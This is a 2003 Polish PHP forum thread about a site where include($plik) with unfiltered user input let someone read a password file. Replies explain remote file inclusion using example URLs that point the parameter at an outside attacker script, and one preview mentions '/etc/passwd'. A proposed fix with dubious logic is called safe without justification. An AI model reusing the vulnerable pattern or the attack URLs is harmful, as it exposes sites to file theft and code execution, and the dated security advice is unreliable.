 zabezpieczenia |
| zabezpieczenia |
Post
#1
|
|
|
Grupa: Zarejestrowani Postów: 24 Pomógł: 0 Dołączył: 14.10.2003 Ostrzeżenie: (0%) 
 |
Ostatnio dużo czytałem o zabezpieczeniech danych przesyłanych drogą post i get
Nawet w prowadzonym przez mnie serwisie stosując stare techniki ktoś odczytał plik d.php gdzie przechowywane sa hasła i zaproponował mi zmainą poniższego kodu na następujący [php:1:38b804c758]<?php if ((!isset($plik)) || ($plik=="")) { include("aktualnosci.php"); } else { include($plik); } ?>[/php:1:38b804c758] na następujący [php:1:38b804c758]<?php $plik = $HTTP_GET_VARS['plik']; if ($plik||!file_exists($plik)) { include("aktualnosci.php"); } else { include($plik); } ?>[/php:1:38b804c758] Czy to jest poprawne i nie ma zadnego haka i jak bylo to mozliew ze sprawdzili moje hasła ___ [scanner] Zmoderowane. Prosze używac BBCode |
 |
 
|
 |
|
Post
#2
|
|
|
Grupa: Zarejestrowani Postów: 61 Pomógł: 0 Dołączył: 16.08.2003 Skąd: Wrocław Ostrzeżenie: (0%)
|
Cytat IMHO ten drugi zapis jest bezpieczny.
Natomiast w pierwszym jest include, który nie sprawdza gdzie dany skrypt się znajduje, przez co można otworzyć skrypty z innych serwerów np: http://twoja.strona.pl/?plik=http://forum....hp.pl/index.php Oczywiście zamiast index.php można dać inny skrypt, który może zrobić to co chce jego autor. Nie jestem pewien czy to o to chodzi, ale chyba powyzszy post to dobrze wyjasnia (IMG:http://forum.php.pl/style_emoticons/default/smile.gif) Tak wiec hasla wydobyl wpisujac: http://twoja.strona.pl/?cel=http://jegostr...rzanyskrypt.php Tak wiec teoretycznie php wysyla juz przerobiony kod... z tym ze wykonuje z podana sciezka... dlatego np. gdy mamy 2 pliki: katalog/wyswietl.php [php:1:7062864d12]<?php include("mama.php"); ?>[/php:1:7062864d12] (plik mama.php tez jest w katalogu "katalog/") i uruchomimy plik: index.php (bedacy w glownym katalogu) zawierajacy: [php:1:7062864d12]<?php include("katalog/wyswietl.php"); ?>[/php:1:7062864d12] to zamiast po wejsciu na plik index.php wyswietlic mama.php wyswietli nam blad... (zastanowcie sie chwilke to zrozumiecie (IMG:http://forum.php.pl/style_emoticons/default/tongue.gif) ) Moze to troche topornie wytlumaczone, ale po prostu w ten sposob gdy zaincludujemy plik spoza naszego serwera to umozliwiamy skryptowi z tamtego serwera dostanie sie do naszych zmiennych (zreszta sam juz nie wiem, sam sobie wszystko pomieszalem (IMG:http://forum.php.pl/style_emoticons/default/biggrin.gif) zalezy od budowy twego skryptu... jest to luka w bezpieczenstwie i tyle) |
|
|
|
madalena zabezpieczenia 20.10.2003, 10:11:29 
Zepco IMHO ten drugi zapis jest bezpieczny.
Natomiast w ... 20.10.2003, 11:04:21 spenalzo <?php
if(!file_exists($plik))
{
include("404.p... 20.10.2003, 11:15:09 kwiateek Cytat<?php
if(!file_exists($plik))
{
include("... 20.10.2003, 20:55:41 spenalzo W takim przypadku:
<?php
$plik = '/etc/passwd';... 20.10.2003, 21:30:29 KaMeLeOn Panowie Miramar i PrZeMoL...
Uwagami na temat wypo... 21.10.2003, 00:00:21 Kinool hmm no wlasnie trapi mi pewna sprawa jak kto robi
... 21.10.2003, 09:42:35 madalena wyjasnijcie mi jeszcze jakim cudem koles odczytal ... 21.10.2003, 14:40:45 Kinool no chyba troche zakreciles Cyklop jesli np za mam... 21.10.2003, 19:49:11 CyklOP Teoretycznie tak, ale wlasnie on jakos umozliwia t... 21.10.2003, 20:11:12 marcin96 Cytat[..]a jego wynik zostanie przeslany na server... 21.10.2003, 20:31:16 jono ja sobie to rozwiązałem zapisując w tablicy na szt... 22.10.2003, 07:16:58 
bulek A moze skorzystac z funckji basename ktora wyciagn... 23.10.2003, 07:53:21  |
|
Aktualny czas: 8.10.2025 - 16:12 |
